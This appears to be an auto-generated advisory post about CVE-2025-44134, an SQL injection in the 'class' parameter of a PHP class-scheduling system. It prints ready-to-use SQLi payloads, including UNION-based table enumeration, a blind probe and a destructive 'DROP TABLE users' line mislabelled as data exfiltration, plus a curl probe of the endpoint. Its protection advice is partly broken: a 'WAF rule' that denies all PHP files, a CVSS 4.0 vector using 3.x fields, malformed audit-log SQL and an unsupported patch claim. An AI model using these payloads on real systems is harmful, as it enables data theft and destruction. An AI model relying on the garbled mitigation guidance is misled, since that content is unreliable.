Code-Projects Online Class and Exam Scheduling System 10, SQL Injection, CVE-2025-44134 (Critical)

By /

Listen to this Post

How CVE-2025-44134 Works

The vulnerability exists in `/Scheduling/pages/class_save.php` where the `class` parameter is directly concatenated into an SQL query without proper sanitization. Attackers can inject malicious SQL payloads through this parameter to manipulate database queries. This allows unauthorized access to sensitive data, including student records, exam details, and administrative credentials. The lack of prepared statements or input validation enables classic SQLi techniques like UNION-based or blind injection.

DailyCVE Form

Platform: Code-Projects Scheduling System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025

What Undercode Say:

Exploitation

1. Union-Based Injection:

class=1' UNION SELECT 1,2,3,4,group_concat(table_name) FROM information_schema.tables-- -

2. Blind SQLi Detection:

class=1' AND (SELECT 1 FROM dual WHERE database() LIKE 'a%')-- -

3. Exfiltrate Data:

class=1' OR 1=1; DROP TABLE users;-- -

Protection

1. Input Validation:

$class = mysqli_real_escape_string($conn, $_POST['class']);

2. Prepared Statements:

$stmt = $conn->prepare("INSERT INTO classes (name) VALUES (?)");
$stmt->bind_param("s", $_POST['class']);

3. WAF Rules:

location ~ .php$ {
deny all;
}

Analytics

  • CVSS 4.0: 9.8 (AV:N/AC:L/AT:N/PR:N/UI:N/S:C/C:H/I:H/A:H)
  • Exploitability: Remote, No Auth
  • Impact: Full DB Compromise

Detection

grep -r "class_save.php" /var/www/html
curl -X POST "http://target/Scheduling/pages/class_save.php" -d "class=1'"

Mitigation

1. Patch: Upgrade to v2.0+

2. Disable `/Scheduling/pages/` if unused.

3. Log suspicious queries:

INSERT INTO audit_log VALUES (NOW(), 'SQLi Attempt', REMOTE_ADDR);

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top